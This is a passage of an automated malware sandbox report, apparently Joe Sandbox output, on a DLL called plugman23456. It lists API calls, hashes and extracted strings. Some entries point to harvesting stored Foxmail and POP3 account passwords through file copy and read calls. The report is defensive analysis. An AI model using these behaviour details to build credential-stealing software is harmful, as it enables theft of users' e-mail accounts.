                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                          • String ID: )$Foxmail$ProgramFiles
                          • API String ID: 672098462-2938083778
                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                          Control-flow Graph

                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                          • __freea.LIBCMT ref: 10008A08
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • __freea.LIBCMT ref: 10008A11
                          • __freea.LIBCMT ref: 10008A36
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                            • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                            • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                          Control-flow Graph

                          APIs
                          • GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                          Control-flow Graph

                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

                          Control-flow Graph

                          APIs
                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-3916222277
                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20

                          Control-flow Graph

                          APIs
                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: String
                          • String ID: LCMapStringEx
                          • API String ID: 2568140703-3893581201

                          Control-flow Graph
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Alloc
                          • String ID: FlsAlloc
                          • API String ID: 2773662609-671089009

                          Control-flow Graph
                          APIs
                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: try_get_function
                          • String ID: FlsAlloc
                          • API String ID: 2742660187-671089009

                          Control-flow Graph
                          APIs
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: CodeInfoPageValid
                          • String ID:
                          • API String ID: 546120528-0

                          Control-flow Graph
                          APIs
                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • _free.LIBCMT ref: 10006CD7
                          • _free.LIBCMT ref: 10006D0D
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorLast_abort
                          • String ID:
                          • API String ID: 2991157371-0

                          Control-flow Graph
                          APIs
                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8,00000000), ref: 10005CA5
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc__crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 2279764990-0

                          Control-flow Graph
                          APIs
                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                          • String ID:
                          • API String ID: 3750050125-0
                          APIs
                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                          • String ID:
                          • API String ID: 806969131-0
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                          • ExitProcess.KERNEL32 ref: 10004AEE
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          APIs
                            • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
                            • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
                            • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                          • _strlen.LIBCMT ref: 10001855
                          • _strlen.LIBCMT ref: 10001869
                          • _strlen.LIBCMT ref: 1000188B
                          • _strlen.LIBCMT ref: 100018AE
                          • _strlen.LIBCMT ref: 100018C8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _strlen$File$CopyCreateDelete
                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                          • API String ID: 3296212668-3023110444
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: %m$~$Gon~$~F@7$~dra
                          • API String ID: 4218353326-230879103
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                          • _free.LIBCMT ref: 10007CFB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10007D1D
                          • _free.LIBCMT ref: 10007D32
                          • _free.LIBCMT ref: 10007D3D
                          • _free.LIBCMT ref: 10007D5F
                          • _free.LIBCMT ref: 10007D72
                          • _free.LIBCMT ref: 10007D80
                          • _free.LIBCMT ref: 10007D8B
                          • _free.LIBCMT ref: 10007DC3
                          • _free.LIBCMT ref: 10007DCA
                          • _free.LIBCMT ref: 10007DE7
                          • _free.LIBCMT ref: 10007DFF
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          APIs
                          • _free.LIBCMT ref: 100059EA
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100059F6
                          • _free.LIBCMT ref: 10005A01
                          • _free.LIBCMT ref: 10005A0C
                          • _free.LIBCMT ref: 10005A17
                          • _free.LIBCMT ref: 10005A22
                          • _free.LIBCMT ref: 10005A2D
                          • _free.LIBCMT ref: 10005A38
                          • _free.LIBCMT ref: 10005A43
                          • _free.LIBCMT ref: 10005A51
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          APIs
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                          Similarity
                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                          • String ID:
                          APIs
                          • GetConsoleCP.KERNEL32 ref: 100094D4
                          • __fassign.LIBCMT ref: 1000954F
                          • __fassign.LIBCMT ref: 1000956A
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                          Strings
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          APIs
                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                          • _free.LIBCMT ref: 100092AB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100092B6
                          • _free.LIBCMT ref: 100092C1
                          • _free.LIBCMT ref: 10009315
                          • _free.LIBCMT ref: 10009320
                          • _free.LIBCMT ref: 1000932B
                          • _free.LIBCMT ref: 10009336
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          APIs
                          • _strlen.LIBCMT ref: 10001607
                          • _strcat.LIBCMT ref: 1000161D
                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                          Similarity
                          • API ID: lstrcatlstrlen$_strcat_strlen
                          • String ID:
                          APIs
                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                          Similarity
                          • API ID: lstrlen$AttributesFilelstrcat
                          • String ID:
                          APIs
                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          APIs
                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                          • _free.LIBCMT ref: 10005B2D
                          • _free.LIBCMT ref: 10005B55
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                          • _abort.LIBCMT ref: 10005B74
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          APIs
